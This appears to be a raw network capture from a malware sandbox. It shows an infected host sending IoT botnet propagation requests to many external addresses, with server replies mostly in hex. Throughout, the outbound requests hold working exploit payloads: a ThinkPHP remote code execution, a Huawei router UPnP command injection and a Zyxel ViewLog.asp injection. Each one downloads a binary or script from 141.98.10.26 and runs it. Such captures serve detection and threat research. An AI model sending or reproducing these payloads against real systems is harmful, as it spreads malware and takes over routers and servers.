Nov 22, 2023 08:38:11.401817083 CET	2611	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:11.732769966 CET	2627	IN	HTTP/1.1 400 Bad Request Date: Wed, 22 Nov 2023 07:38:11 GMT Server: Apache Content-Length: 285 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 32 37 2e 30 2e 30 2e 31 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><hr><address>Apache Server at 127.0.0.1 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
88	192.168.2.23	53078	112.46.225.207	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:11.457411051 CET	2612	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0

Session ID	Source IP	Source Port	Destination IP	Destination Port
89	192.168.2.23	34836	112.125.213.26	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:11.688359022 CET	2624	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:11.995167971 CET	2661	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:33:57 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
90	192.168.2.23	39768	112.173.100.220	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:11.976232052 CET	2630	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:12.263972044 CET	2705	IN	HTTP/1.1 400 Bad Request Connection: close Content-Type: text/html Content-Length: 412 Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 3c 70 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 70 3e 3c 2f 68 31 3e 0a 20 20 20 20 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 20 26 23 78 32 37 3b 49 6e 76 61 6c 69 64 20 48 54 54 50 20 56 65 72 73 69 6f 6e 3a 20 26 71 75 6f 74 3b 68 69 6e 6b 5c 78 30 37 70 70 2f 69 6e 76 6f 6b 65 66 75 6e 63 74 69 6f 6e 26 61 6d 70 3b 66 75 6e 63 74 69 6f 6e 3d 63 61 6c 6c 5f 75 73 65 72 5f 66 75 6e 63 5f 61 72 72 61 79 26 61 6d 70 3b 76 61 72 73 5b 30 5d 3d 73 68 65 6c 6c 5f 65 78 65 63 26 61 6d 70 3b 76 61 72 73 5b 31 5d 5b 5d 3d 26 23 78 32 37 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 62 69 6e 73 2f 78 38 36 20 2d 4f 20 74 68 6f 6e 6b 70 68 70 20 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 68 6f 6e 6b 70 68 70 20 3b 20 2e 2f 74 68 6f 6e 6b 70 68 70 20 54 68 69 6e 6b 50 48 50 20 3b 20 72 6d 20 2d 72 66 20 74 68 69 6e 6b 70 68 70 26 23 78 32 37 3b 20 48 54 54 50 2f 31 2e 31 26 71 75 6f 74 3b 26 23 78 32 37 3b 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <title>Bad Request</title> </head> <body> <h1><p>Bad Request</p></h1> Invalid HTTP Version 'Invalid HTTP Version: "hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1"' </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
91	192.168.2.23	47422	112.126.155.54	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:12.005043983 CET	2692	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:12.309892893 CET	2707	IN	HTTP/1.1 400 Bad Request Content-Type: text/html; charset=us-ascii Server: Microsoft-HTTPAPI/2.0 Date: Wed, 22 Nov 2023 07:35:04 GMT Connection: close Content-Length: 311 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>

Session ID	Source IP	Source Port	Destination IP	Destination Port
92	192.168.2.23	43826	112.16.247.130	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:12.085098028 CET	2693	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:12.481754065 CET	2731	IN	HTTP/1.1 404 Not Found Content-Length: 0 X-NWS-LOG-UUID: 2351411997783337935 Connection: close Server: lego_v4 Date: Wed, 22 Nov 2023 07:38:12 GMT X-Cache-Lookup: Return Directly
Nov 22, 2023 08:38:12.679848909 CET	2742	IN	Data Raw: 0d Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
93	192.168.2.23	46134	41.34.202.189	37215

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.131599903 CET	2806	OUT	POST /ctrlt/DeviceUpgrade_1 HTTP/1.1 Content-Length: 430 Connection: keep-alive Accept: / Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669" Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 34 31 2e 39 38 2e 31 30 2e 32 36 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 6d 69 70 73 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 141.98.10.26 -l /tmp/binary -r /mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary mips)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Nov 22, 2023 08:38:13.953957081 CET	2916	IN	HTTP/1.1 200 OK Connection: Keep-Alive Content-Type: text/xml; charset="utf-8" Server: Linux UPnP/1.0 Huawei-ATP-IGD Date: Sat, 01 Jan 2000 15:37:43 GMT EXT: Content-Length: 259

Session ID	Source IP	Source Port	Destination IP	Destination Port
94	192.168.2.23	58602	31.136.109.160	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.198996067 CET	2807	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:13.776721001 CET	2913	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.928451061 CET	3034	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.360091925 CET	3385	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.967499018 CET	3887	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.182178974 CET	4960	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.147366047 CET	7441	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.006181955 CET	11906	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
95	192.168.2.23	37932	31.136.225.15	8080

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.199243069 CET	2808	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:13.776721001 CET	2913	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:14.928464890 CET	3035	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:17.360091925 CET	3385	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:21.967499018 CET	3887	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:31.182178974 CET	4960	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:38:51.147366047 CET	7441	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Nov 22, 2023 08:39:28.006158113 CET	11906	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 32 36 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.26/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
96	192.168.2.23	34728	112.46.49.148	80

Timestamp	kBytes transferred	Direction	Data
Nov 22, 2023 08:38:13.291656017 CET	2842	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.26/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Nov 22, 2023 08:38:13.699274063 CET	2912	IN	HTTP/1.1 404 Not Found Content-Length: 0 X-NWS-LOG-UUID: 5984937437771958866 Connection: close Server: ECDN_D2 Date: Wed, 22 Nov 2023 07:38:13 GMT X-Cache-Lookup: Return Directly
Nov 22, 2023 08:38:13.904167891 CET	2915	IN	Data Raw: 0d Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
97	192.168.2.23	53990	31.136.23.21	8080

Timestamp	kBytes transferred	Direction	Data
